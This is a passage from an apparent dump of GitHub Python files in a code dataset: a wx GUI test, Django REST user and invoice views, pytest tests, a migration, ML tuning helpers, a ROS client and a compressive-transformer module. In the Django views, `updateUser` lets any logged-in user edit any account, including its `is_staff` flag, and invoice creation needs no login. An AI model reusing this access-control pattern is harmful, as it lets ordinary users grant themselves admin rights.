CountingPanel(wx.Panel):\n def __init__(self, parent):\n wx.Panel.__init__(self, parent)\n\n # Attributes\n self._counter = wx.StaticText(self, label=\"0\")\n self._counter.SetFont(wx.Font(16, wx.MODERN, wx.NORMAL, wx.NORMAL))\n\n # Layout\n self.__DoLayout()\n\n # Event Handlers\n self.Bind(wx.EVT_BUTTON, self.OnButton)\n self.Bind(EVT_COUNT, self.OnCount)\n\n def __DoLayout(self):\n sizer = wx.BoxSizer(wx.VERTICAL)\n button = wx.Button(self, ID_COUNT, \"Increment Counter\")\n sizer.AddMany([(button, 0, wx.ALIGN_CENTER),\n ((15, 15), 0),\n (self._counter, 0, wx.ALIGN_CENTER)])\n self.SetSizer(sizer)\n\n def OnButton(self, evt):\n worker = CountingThread(self, 1)\n worker.start()\n\n def OnCount(self, evt):\n val = int(self._counter.GetLabel()) + evt.GetValue()\n self._counter.SetLabel(unicode(val))\n\n\n\n\n# -----------------------------------------------------------------------------#\n\nif __name__ == '__main__':\n cap = cv2.VideoCapture(0)\n APP = wx.App(False)\n FRAME = CountingFrame(None)\n FRAME.Show()\n APP.MainLoop()\n","repo_name":"antnieszka/GestureMusicPlayer","sub_path":"old_code_snippets/gui-test.py","file_name":"gui-test.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"42184398238","text":"from django.shortcuts import render\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated, IsAdminUser\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth.models import User\n\nfrom base.serializers import ProductSerializer, UserSerializer, UserSerializerWithToken, InvoiceSerializer, \\\n Zadanie2Serializer\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\nfrom rest_framework_simplejwt.views import TokenObtainPairView\n\nfrom django.contrib.auth.hashers import make_password\nfrom rest_framework import status\n\n# Если вы хотите настроить утверждения, содержащиеся в веб-токенах,\n# которые генерируются представлениями TokenObtainPairView и TokenObtainSlidingView,\n# создайте подкласс для желаемого представления, а также подкласс для его\n# соответствующего сериализатора.\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n def validate(self, attrs):\n data = super().validate(attrs)\n\n #UserSerializerWithToken - в этот класс отправляем нашего\n # юзера и получаем по нему сериализованню сущность,\n # у которой есть определенные данные (id, username, token и тд)\n serializer = UserSerializerWithToken(self.user).data\n for k, v in serializer.items():\n data[k] = v\n return data\n\n#Это настройска удтверждений по токену JWT.\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n\n\n@api_view(['POST'])\ndef registerUser(request):\n data = request.data\n try:\n user = User.objects.create(\n first_name=data['name'],\n username=data['email'],\n email=data['email'],\n password=make_password(data['password'])\n )\n\n serializer = UserSerializerWithToken(user, many=False)\n return Response(serializer.data)\n except:\n message = {'detail': 'User with this email already exists'}\n return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUserProfile(request):\n user = request.user\n serializer = UserSerializerWithToken(user, many=False)\n\n data = request.data\n user.first_name = data['name']\n user.username = data['email']\n user.email = data['email']\n\n if data['password'] != '':\n user.password = make_password(data['password'])\n\n user.save()\n\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef getUserProfile(request):\n user = request.user\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUsers(request):\n users = User.objects.all()\n serializer = UserSerializer(users, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAdminUser])\ndef getUserById(request, pk):\n user = User.objects.get(id=pk)\n serializer = UserSerializer(user, many=False)\n return Response(serializer.data)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef updateUser(request, pk):\n user = User.objects.get(id=pk)\n\n data = request.data\n\n user.first_name = data['name']\n user.username = data['email']\n user.email = data['email']\n user.is_staff = data['isAdmin']\n\n user.save()\n\n serializer = UserSerializer(user, many=False)\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\n@permission_classes([IsAdminUser])\ndef deleteUser(request, pk):\n userForDeletion = User.objects.get(id=pk)\n userForDeletion.delete()\n return Response('User was deleted')\n\n\n@api_view(['POST'])\ndef createInvoice(request):\n data = request.data\n\n # try:\n from base.models import Invoice\n invoice = Invoice.objects.create(\n _id=data['_id'],\n type=data['type'],\n sum=data['sum'],\n job_id=data['job_id']\n )\n\n serializer = InvoiceSerializer(invoice, many=False)\n return Response(serializer.data)\n # except:\n # message = {'error'}\n # return Response(message, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n@api_view(['GET'])\ndef getInvoices(request):\n from base.models import Invoice\n invoices = Invoice.objects.all()\n serializer = InvoiceSerializer(invoices, many=True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef postUserZadanie2get(request):\n from base.models import Zadanie2\n Zadanie2 = Zadanie2.objects.all()\n serializer = Zadanie2Serializer(Zadanie2, many=True)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef postUserZadanie2(request):\n data = request.data\n\n from base.models import Zadanie2\n zadanie2 = Zadanie2.objects.create(\n user_name=data['user_name'],\n user_phone=data['user_phone'],\n user_date=data['user_date'],\n user_email=data['user_email']\n )\n\n serializer = Zadanie2Serializer(zadanie2, many=False)\n return Response(serializer.data)","repo_name":"DanRHamidullin/DIPLOM","sub_path":"base/views/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38926541863","text":"import pytest\n\nfrom config.pom import StateFunctions\n\nfrom base.variables import *\n\n\n@pytest.mark.usefixtures(\"setup\")\nclass TestBohUpdate:\n\n def test_update(self):\n library = StateFunctions(self.driver)\n library.cardano_page()\n\n while Variables.i < 3:\n Variables.day_yesterday = Variables.date\n\n library.get_price()\n library.dot_remove()\n library.wait_5s()\n\n library.data_base()\n #Variables.i = 3\n Variables.file.close()\n print(\"Success\")\n","repo_name":"PavelKryshtal/S-P500_2","sub_path":"config/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23449514037","text":"import pytest # used for our unit tests\n\n\ndef format_time(seconds):\n minutes, seconds = divmod(seconds, 60)\n hours, minutes = divmod(minutes, 60)\n\n if hours > 0:\n return f\"{hours}h{minutes}min{seconds}s\"\n elif minutes > 0:\n return f\"{minutes}min{seconds}s\"\n else:\n return f\"{seconds}s\"\n\n\n#Below, each test case is represented by a tuple passed to the @pytest.mark.parametrize decorator.\n#The first element of the tuple is the name of the test case, and the second element is the value to be passed to the format_time() function.\n@pytest.mark.parametrize('test_input,expected', [\n ('0', '0s'),\n ('59', '59s'),\n ('60', '1min0s'),\n ('119', '1min59s'),\n ('3600', '1h0min0s'),\n ('3601', '1h0min1s'),\n ('3660', '1h1min0s'),\n ('7200', '2h0min0s'),\n])\ndef test_format_time(test_input, expected):\n #For each test case, we call the format_time() function and compare the returned value to the expected value.\n assert format_time(int(test_input)) == expected\n\n\n#We use the @pytest.mark.parametrize decorator again to test the invalid inputs.\n@pytest.mark.parametrize('test_input', [\n None,\n 'abc',\n -1\n])\ndef test_format_time_invalid_inputs(test_input):\n #For each invalid input, we expect a TypeError or ValueError to be raised.\n with pytest.raises((TypeError, ValueError)):\n format_time(test_input)","repo_name":"xuwenhao/geektime-ai-course","sub_path":"auto_unit_test.py","file_name":"auto_unit_test.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":569,"dataset":"github-code","pt":"48"} +{"seq_id":"12152950496","text":"\"\"\"added user.eula field\n\nRevision ID: c8ae6833c7cf\nRevises: 6257d437094a\nCreate Date: 2022-12-01 12:11:56.816167\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = 'c8ae6833c7cf'\ndown_revision = '6257d437094a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('users', sa.Column('eula', sa.Boolean(), server_default=sa.text('FALSE'), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('users', 'eula')\n # ### end Alembic commands ###\n","repo_name":"deepchecks/monitoring","sub_path":"backend/deepchecks_monitoring/public_migrations/versions/c8ae6833c7cf_added_user_eula_field.py","file_name":"c8ae6833c7cf_added_user_eula_field.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"29581557250","text":"import numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV\n\ndef rf_tuning(rfc, X_train, y_train):\n # randomforest hyperparameter tuning\n\n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(start = 50, stop = 200, num = 4)]\n # Number of features to consider at every split\n max_features = ['sqrt']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(10, 100, num = 10)]\n max_depth.append(None)\n # Minimum number of samples required to split a node\n min_samples_split = [2, 3, 5, 10, 20, 50]\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [1, 2, 4, 5, 10]\n # Method of selecting samples for training each tree\n bootstrap = [True, False]\n # Create the random grid\n random_grid = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_split': min_samples_split,\n 'min_samples_leaf': min_samples_leaf,\n 'bootstrap': bootstrap}\n\n rf_random = GridSearchCV(estimator=rfc, param_grid=random_grid, scoring='balanced_accuracy', cv=3, verbose=1, n_jobs=-1)\n rf_random.fit(X_train, y_train)\n return rf_random.best_params_\n\ndef dt_tuning(dtc, X_train, y_train):\n params = {\n 'max_depth': [None, 2, 3, 5, 10, 20, 40, 50],\n 'min_samples_split': [0.01, 0.05, 0.1, 0.2],\n 'min_samples_leaf': [0.01, 0.05, 0.1, 0.2],\n 'max_features': [None, 'sqrt', 'log2', 0.3, 0.5, 0.75, 1.0],\n 'criterion': [\"gini\", \"entropy\"],\n\n }\n dt_random = GridSearchCV(estimator=dtc, param_grid=params, scoring='balanced_accuracy', cv=3, verbose=2, n_jobs=-1)\n dt_random.fit(X_train, y_train)\n return dt_random.best_params_\n \ndef xgboost_tuning(xgb, X_train, y_train):\n \n params = {\n 'learning_rate': [0.001, 0.01, 0.1, 0.15, 0.2],\n 'max_depth': [3, 5, 7, 9, 12, 15, 17, 25],\n 'min_child_weight': [1, 3, 5, 7],\n 'gamma': [0.0, 0.1, 0.2, 0.3, 0.4],\n 'colsample_bytree': [0.3, 0.4, 0.5, 0.7]\n }\n\n xgb_model = xgb.XGBClassifier()\n xgb_grid = GridSearchCV(estimator=xgb_model, param_grid=params, cv=5, n_jobs=-1, verbose=3)\n xgb_grid.fit(X_train, y_train)\n print(\"xgb best params: \")\n print(xgb_grid.best_params_)\n return xgb_grid.best_params_","repo_name":"LuisMongeB/earthquake-alert-prediction","sub_path":"hyperparameter_tuning.py","file_name":"hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24021873400","text":"#!/usr/bin/env python3\n\nimport rospy\nimport roslib\nimport actionlib\n\nfrom foundation_cource.msg import MoveTurtleAction,MoveTurtleGoal\n\ndef turtle_move_client():\n #start the client node and set it to moveturtle action\n client=actionlib.SimpleActionClient(\"Turtle_move_ac_client\",MoveTurtleAction)\n #wait until the server is active to start sending goals\n client.wait_for_server()\n #create a goal to send \n goal=MoveTurtleGoal()\n #request x and y goals from user and cast it to float\n goal[0]=float(input(\"Enter goal X: \"))\n goal[1]=float(input(\"Enter goal Y: \"))\n #send goal to action server\n client.send_goal(goal)\n #wait fot client to finish performing action\n client.wait_for_result()\n #return the final pos to main method to be printed\n return client.get_result()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n try:\n rospy.init_node('move_turtle_client')\n result=turtle_move_client()\n rospy.loginfo(\"Final position is x:%f , y:%f \",result.final_pos[0],result.final_pos[1])\n except rospy.ROSInterruptException:\n rospy.loginfo(\"Program interupted before completion\")","repo_name":"malwaru/ROS_basics_FC","sub_path":"build/catkin_generated/installspace/turtle_move_client.py","file_name":"turtle_move_client.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13467405401","text":"from app.models.map import Map\n\nfrom app.scripts.assign_start_pos import assign_character_start, random_item, get_rand_ranges\nfrom app.scripts.combinations import find_combinations\n\n\ndef startup():\n \"\"\"executes primary functions for initialisation, returns a dict\\\n containing relevant infos\"\"\"\n\n items = []\n matrix_map = Map(user_height=20, user_length=20)\n range_maze = get_rand_ranges(matrix_map.box)\n characters = assign_character_start(range_maze, matrix_map.box)\n item_list = [(\"tablet\", 4), (\"glasses\", 5), (\"toy\", 6)]\n for item in item_list:\n items.append(random_item(item_name=item[0], item_ident=item[1], maze=matrix_map))\n\n for character in characters:\n if character.name == \"Bernard\":\n start_idx = character.map_identifier\n matrix_map.insert(character.map_identifier, character.position)\n\n if character.name == \"Ford\":\n end_idx = character.map_identifier\n matrix_map.insert(character.map_identifier, character.position)\n\n items_identifiers = []\n for item in items:\n items_identifiers.append(item.identifier)\n\n possible_paths = find_combinations(\n item_id_list=items_identifiers,\n start_node_id=start_idx,\n end_node_id=end_idx\n )\n\n return {\n \"possible_paths\": possible_paths,\n \"maze\": matrix_map,\n \"items\": items,\n \"characters\": characters,\n }\n","repo_name":"Psemp/oc_project_11","sub_path":"app/scripts/startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41230454379","text":"class Triangle:\r\n def __init__(self, a, b, c):\r\n self.a = a\r\n self.b = b\r\n self.c = c\r\n\r\n def validate_triangle(self):\r\n \r\n if (self.a + self.b > self.c) and (self.b + self.c > self.a) and (self.c + self.a > self.b):\r\n return \"Valid Triangle\"\r\n else:\r\n return \"Invalid triangle\"\r\n \r\n \r\nclass Rectangle:\r\n def __init__(self, l, b):\r\n self.l = l\r\n self.b = b\r\n\r\n def validate_rectangle(self):\r\n \r\n if self.l == self.b:\r\n return \"Invalid rectangle\"\r\n elif self.l > self.b:\r\n if self.l == 2*self.b:\r\n return \"Valid Rectangle\"\r\n else:\r\n return \"Invalid rectangle\"\r\n else:\r\n if self.b == 2*self.l:\r\n return \"Valid Rectangle\"\r\n else:\r\n return \"Invalid rectangle\"\r\n","repo_name":"vara0715/PRM-Assignment","sub_path":"prm_q2.py","file_name":"prm_q2.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31848979771","text":"# Modified from https://github.com/lucidrains/compressive-transformer-pytorch\n\nimport math\nimport sys\nfrom collections import namedtuple\nfrom functools import partial\nfrom inspect import isfunction\nfrom typing import Type, Tuple, List, Union\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\n\n# structs\n\nMemory: Type[Tuple[Tensor, List[Tensor], Tensor]] = namedtuple('Memory', ['mem', 'compressed_mem', 'lt_mem'])\n\n\n# helper functions\n\ndef to(t):\n return {'dtype': t.dtype, 'device': t.device}\n\n\ndef cast_tuple(el):\n return el if isinstance(el, tuple) else (el,)\n\n\ndef default(x, val):\n if x is not None:\n return x\n return val if not isfunction(val) else val()\n\n\ndef max_neg_value(tensor):\n return -torch.finfo(tensor.dtype).max\n\n\ndef reshape_dim(t, dim, split_dims):\n shape = list(t.shape)\n num_dims = len(shape)\n dim = (dim + num_dims) % num_dims\n shape[dim:dim + 1] = split_dims\n return t.reshape(shape)\n\n\ndef split_at_index(dim, index, t):\n pre_slices = (slice(None),) * dim\n l = (*pre_slices, slice(None, index))\n r = (*pre_slices, slice(index, None))\n return t[l], t[r]\n\n\ndef queue_fifo(*args, length, dim=-2):\n queue = torch.cat(args, dim=dim)\n if length > 0:\n return split_at_index(dim, -length, queue)\n\n device = queue.device\n shape = list(queue.shape)\n shape[dim] = 0\n return queue, torch.empty(shape, device=device)\n\n\ndef shift(x):\n *_, i, j = x.shape\n zero_pad = torch.zeros((*_, i, i), **to(x))\n x = torch.cat([x, zero_pad], -1)\n l = i + j - 1\n x = x.view(*_, -1)\n zero_pad = torch.zeros(*_, -x.size(-1) % l, **to(x))\n shifted = torch.cat([x, zero_pad], -1).view(*_, -1, l)\n return shifted[..., :i, i - 1:]\n\n\ndef iterate_tensor(t):\n length = t.shape[0]\n for ind in range(length):\n yield t[ind]\n\n\n# full attention for calculating auxiliary reconstruction loss\n\ndef full_attn(q, k, v, dropout_fn=None):\n *_, dim = q.shape\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * (dim ** -0.5)\n attn = dots.softmax(dim=-1)\n if dropout_fn is not None:\n attn = dropout_fn(attn)\n return torch.einsum('bhij,bhjd->bhid', attn, v)\n\n\n# helper classes\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n\n def forward(self, x, **kwargs):\n out = self.fn(x, **kwargs)\n out = cast_tuple(out)\n ret = (out[0] + x), *out[1:]\n return ret\n\n\nclass GRUGating(nn.Module):\n def __init__(self, dim, fn, mogrify=False):\n super().__init__()\n self.dim = dim\n self.fn = fn\n self.gru = nn.GRUCell(dim, dim)\n if mogrify:\n try:\n # noinspection PyPackageRequirements\n from mogrifier import Mogrifier\n self.mogrify = Mogrifier(dim, factorize_k=dim // 4) if mogrify else None\n except ImportError:\n print('!! mogrify is set, but mogrifier library not available!'\n ' Run \"pip install mogrifier\" to fix.', file=sys.stderr)\n\n def forward(self, x, **kwargs):\n batch, dim = x.shape[0], self.dim\n out = self.fn(x, **kwargs)\n (y, *rest) = cast_tuple(out)\n\n if self.mogrify is not None:\n y, x = self.mogrify(y, x)\n\n gated_output = self.gru(\n y.reshape(-1, dim),\n x.reshape(-1, dim)\n )\n\n gated_output = gated_output.reshape(batch, -1, dim)\n ret = gated_output, *rest\n return ret\n\n\nclass PreNorm(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\n\nclass ConvCompress(nn.Module):\n def __init__(self, dim, ratio=4):\n super().__init__()\n self.conv = nn.Conv1d(dim, dim, ratio, stride=ratio)\n\n def forward(self, mem):\n mem = mem.transpose(1, 2)\n compressed_mem = self.conv(mem)\n return compressed_mem.transpose(1, 2)\n\n\nclass DetachedConvCompress(nn.Module):\n def __init__(self, reference: ConvCompress):\n super().__init__()\n self.reference = reference\n\n def forward(self, mem):\n weight = self.reference.conv.weight.detach()\n bias = self.reference.conv.bias.detach()\n\n mem = mem.transpose(1, 2)\n compressed_mem = F.conv1d(mem, weight, bias, self.reference.conv.stride,\n self.reference.conv.padding, self.reference.conv.dilation,\n self.reference.conv.groups)\n return compressed_mem.transpose(1, 2)\n\n\n# feedforward\n\nclass GELU_(nn.Module):\n def forward(self, x):\n return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n\n\nGELU = nn.GELU if hasattr(nn, 'GELU') else GELU_\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, ff_dim, dropout=0., activation=None, glu=False):\n super().__init__()\n activation = default(activation, GELU)\n\n self.glu = glu\n self.w1 = nn.Linear(dim, ff_dim * (2 if glu else 1))\n self.act = activation()\n self.dropout = nn.Dropout(dropout)\n self.w2 = nn.Linear(ff_dim, dim)\n\n def forward(self, x, **kwargs):\n if not self.glu:\n x = self.w1(x)\n x = self.act(x)\n else:\n x, v = self.w1(x).chunk(2, dim=-1)\n x = self.act(x) * v\n\n x = self.dropout(x)\n x = self.w2(x)\n return x\n\n\nclass CompressionStage(nn.Module):\n\n def __init__(self, dim, cmem_ratio, cmem_len, attn_heads, attn_dim_heads, reconstruction_attn_dropout,\n prev_lvl_mem_start_index, prev_lvl_mem_len) -> None:\n super().__init__()\n self.attn_heads = attn_heads # of the containing SelfAttention object\n self.attn_dim_heads = attn_dim_heads\n self.mem_len_this_lvl = cmem_len\n self.prev_lvl_mem_start_index = prev_lvl_mem_start_index\n self.prev_lvl_mem_len = prev_lvl_mem_len\n\n assert prev_lvl_mem_len % cmem_ratio == 0, \\\n f'mem length of previous level ({prev_lvl_mem_len}) must be divisble by compression ratio ({cmem_ratio})'\n\n self.reconstruction_attn_dropout = nn.Dropout(reconstruction_attn_dropout)\n self.compress_mem_fn = ConvCompress(dim, cmem_ratio)\n self.compress_mem_fn_without_grad = DetachedConvCompress(self.compress_mem_fn)\n\n def forward(self, prev_cmem_this_lvl, old_mem_prev_lvl, prev_lvl_mem_len, q, k, v, to_kv_weight):\n compressed_mem = self.compress_mem_fn_without_grad(old_mem_prev_lvl)\n old_cmem, new_cmem = split_at_index(1, -self.mem_len_this_lvl,\n torch.cat((prev_cmem_this_lvl, compressed_mem), dim=1))\n aux_loss = torch.zeros(1, requires_grad=True, **to(prev_cmem_this_lvl))\n\n if not self.training:\n return old_cmem, new_cmem, aux_loss\n\n # calculate compressed memory auxiliary loss if training\n merge_heads = lambda x: reshape_dim(x, -1, (-1, self.attn_dim_heads)).transpose(1, 2)\n\n compressed_mem = self.compress_mem_fn(old_mem_prev_lvl.detach())\n cmem_k, cmem_v = F.linear(compressed_mem, to_kv_weight.detach()).chunk(2, dim=-1)\n cmem_k, cmem_v = map(merge_heads, (cmem_k, cmem_v))\n cmem_k, cmem_v = map(lambda x: x.expand(-1, self.attn_heads, -1, -1), (cmem_k, cmem_v))\n\n old_mem_range = slice(- min(prev_lvl_mem_len, self.prev_lvl_mem_len) - self.prev_lvl_mem_start_index,\n -self.prev_lvl_mem_start_index)\n old_mem_k, old_mem_v = map(lambda x: x[:, :, old_mem_range].clone(), (k, v))\n\n q, old_mem_k, old_mem_v = map(torch.detach, (q, old_mem_k, old_mem_v))\n\n attn_fn = partial(full_attn, dropout_fn=self.reconstruction_attn_dropout)\n\n aux_loss = F.mse_loss(\n attn_fn(q, old_mem_k, old_mem_v),\n attn_fn(q, cmem_k, cmem_v)\n )\n\n return old_cmem, new_cmem, aux_loss\n\n\n# attention.\n\nclass SelfAttention(nn.Module):\n\n @staticmethod\n def validate_cmem_parameters(seq_len: int, mem_len: int,\n cmem_lengths: List[int], cmem_ratios: Union[List[int], int]):\n assert len(cmem_lengths) == len(cmem_ratios), f'{cmem_lengths}, {cmem_ratios} should have same length!'\n compression_levels = len(cmem_lengths)\n # compression stage 0 is mem -> cmem\n one_input_block_size = seq_len\n for i in range(compression_levels):\n assert one_input_block_size >= cmem_ratios[i], \\\n f'At compression level {i}, one input block of {seq_len} tokens is already reduced to ' \\\n f'{one_input_block_size} compressed tokens, cannot be compressed again with ratio {cmem_ratios[i]}'\n assert cmem_lengths[i] >= (one_input_block_size // cmem_ratios[i]), \\\n f'length of compressed memory at level {i + 1} should be at least the compressed input block length ' \\\n f'at level {i} ({one_input_block_size}) divided by the compression ratio {cmem_ratios[i]}, ' \\\n f'i.e. at least {int(one_input_block_size // cmem_ratios[i])}'\n one_input_block_size //= cmem_ratios[i]\n\n # simulate information flow\n log = ''\n mem = 0\n cmems = [0] * compression_levels\n while True: # simulate until lt mem would be filled. then, sizes do not change anymore (everything full)\n mem += seq_len\n log += f'i={seq_len} -> '\n if mem <= mem_len:\n log += f'm={mem}\\n'\n continue\n old_mem = mem - mem_len\n mem = mem_len\n log += f'm={mem} -> {old_mem}'\n for lvl in range(compression_levels):\n log += f' --/{cmem_ratios[lvl]}--> c{lvl}='\n assert old_mem % cmem_ratios[lvl] == 0, \\\n f'mem length {old_mem} from previous layer not divisible by compression ratio {cmem_ratios[lvl]} ' \\\n f'at compression level {lvl}. Log:\\n{log}'\n cmems[lvl] += old_mem // cmem_ratios[lvl]\n if cmems[lvl] <= cmem_lengths[lvl]:\n log += f'{cmems[lvl]}'\n old_mem = 0\n break\n old_mem = cmems[lvl] - cmem_lengths[lvl]\n cmems[lvl] = cmem_lengths[lvl]\n log += f'{cmems[lvl]} -> {old_mem}'\n log += '\\n'\n if old_mem > 0:\n break\n\n def __init__(self, dim, seq_len, mem_len: int,\n cmem_lengths: List[int], cmem_ratios: Union[List[int], int],\n use_ltmem=True,\n heads=8, attn_dropout=0., dropout=0.,\n reconstruction_attn_dropout=0., one_kv_head=False):\n super().__init__()\n assert (dim % heads) == 0, 'dimension must be divisible by the number of heads'\n if isinstance(cmem_ratios, int):\n cmem_ratios = [cmem_ratios] * len(cmem_lengths)\n SelfAttention.validate_cmem_parameters(seq_len, mem_len, cmem_lengths, cmem_ratios)\n\n self.heads = heads\n self.dim_head = dim // heads\n self.seq_len = seq_len\n self.mem_len = mem_len\n self.num_cmem_stages = len(cmem_lengths)\n self.cmem_lengths = cmem_lengths\n self.cmem_ratios = cmem_ratios\n self.use_ltmem = use_ltmem\n self.scale = self.dim_head ** (-0.5)\n\n self.compression_stages = nn.ModuleList()\n running_start_index = self.seq_len\n prev_length = mem_len\n for i in range(self.num_cmem_stages):\n self.compression_stages.append(CompressionStage(\n dim, cmem_ratios[i], cmem_lengths[i], heads, self.dim_head,\n reconstruction_attn_dropout,\n prev_lvl_mem_start_index=running_start_index,\n prev_lvl_mem_len=prev_length))\n prev_length = cmem_lengths[i]\n running_start_index += prev_length\n\n if self.use_ltmem:\n self.cmem_to_ltmem_query = nn.Parameter(torch.zeros(dim), requires_grad=True)\n self.ltmem_tokv = nn.Linear(dim, dim * 2, bias=False)\n self.recurrence = nn.GRUCell(dim, dim, bias=False)\n\n self.to_q = nn.Linear(dim, dim, bias=False)\n\n kv_dim = self.dim_head if one_kv_head else dim\n self.to_kv = nn.Linear(dim, kv_dim * 2, bias=False)\n self.to_out = nn.Linear(dim, dim)\n\n self.attn_dropout = nn.Dropout(attn_dropout)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, memories=None, pos_emb=None, input_mask=None, calc_memory=True, **kwargs):\n b, t, e, h, dim_h = *x.shape, self.heads, self.dim_head\n\n memories: Memory = default(memories, (None, None, None))\n mem, cmems, ltmem = memories\n\n init_empty_mem = lambda: torch.empty(b, 0, e, **to(x))\n mem = default(mem, init_empty_mem)\n cmems = default(cmems, lambda: [init_empty_mem() for i in range(self.num_cmem_stages)])\n ltmem = default(ltmem, init_empty_mem)\n\n mem_len = mem.shape[1]\n cmem_len_sum = sum(cmem.shape[1] for cmem in cmems)\n ltmem_len = ltmem.shape[1]\n assert 0 <= ltmem_len <= 1, str(ltmem)\n\n q = self.to_q(x)\n\n if self.num_cmem_stages == 0:\n kv_input = torch.cat((ltmem, mem, x), dim=1)\n else:\n kv_input = torch.cat((ltmem, *cmems, mem, x), dim=1)\n kv_len = kv_input.shape[1]\n k, v = self.to_kv(kv_input).chunk(2, dim=-1)\n\n merge_heads = lambda x: reshape_dim(x, -1, (-1, dim_h)).transpose(1, 2)\n q, k, v = map(merge_heads, (q, k, v))\n\n k, v = map(lambda x: x.expand(-1, h, -1, -1), (k, v))\n\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * self.scale\n mask_value = max_neg_value(dots)\n\n if pos_emb is not None:\n pos_emb = pos_emb[:, -kv_len:].type(q.dtype)\n pos_dots = torch.einsum('bhid,hjd->bhij', q, pos_emb) * self.scale\n pos_dots = shift(pos_dots)\n dots = dots + pos_dots\n\n if input_mask is not None:\n mask = input_mask[:, None, :, None] * input_mask[:, None, None, :]\n mask = F.pad(mask, [mem_len + cmem_len_sum + ltmem_len, 0], value=True)\n dots.masked_fill_(~mask, mask_value)\n\n total_mem_len = mem_len + cmem_len_sum + ltmem_len\n mask = torch.ones(t, t + total_mem_len, **to(x)).triu_(diagonal=1 + total_mem_len).bool()\n dots.masked_fill_(mask[None, None, ...], mask_value)\n\n attn = dots.softmax(dim=-1)\n attn = self.attn_dropout(attn)\n\n out = torch.einsum('bhij,bhjd->bhid', attn, v)\n out = out.transpose(1, 2).reshape(b, t, -1)\n logits = self.to_out(out)\n logits = self.dropout(logits)\n\n new_mem = mem\n new_cmems = cmems\n new_ltmem = ltmem\n aux_loss = torch.zeros(1, requires_grad=False, **to(q))\n\n if self.seq_len > t or not calc_memory:\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n # calculate memory and compressed memory\n\n old_mem, new_mem = queue_fifo(mem, x, length=self.mem_len, dim=1)\n old_mem_padding = old_mem.shape[1] % self.cmem_ratios[0]\n\n if old_mem_padding != 0:\n old_mem = F.pad(old_mem, [0, 0, old_mem_padding, 0], value=0.)\n\n if old_mem.shape[1] == 0 or self.num_cmem_stages <= 0:\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n prev_mem_len = mem_len\n old_mem_prev_lvl = old_mem\n for i in range(self.num_cmem_stages):\n if old_mem_prev_lvl.size(1) == 0:\n break\n old_mem_prev_lvl, new_cmems[i], lvl_aux_loss = self.compression_stages[i](\n prev_cmem_this_lvl=cmems[i],\n old_mem_prev_lvl=old_mem_prev_lvl,\n prev_lvl_mem_len=prev_mem_len,\n q=q, k=k, v=v,\n to_kv_weight=self.to_kv.weight\n )\n aux_loss += lvl_aux_loss\n prev_mem_len = 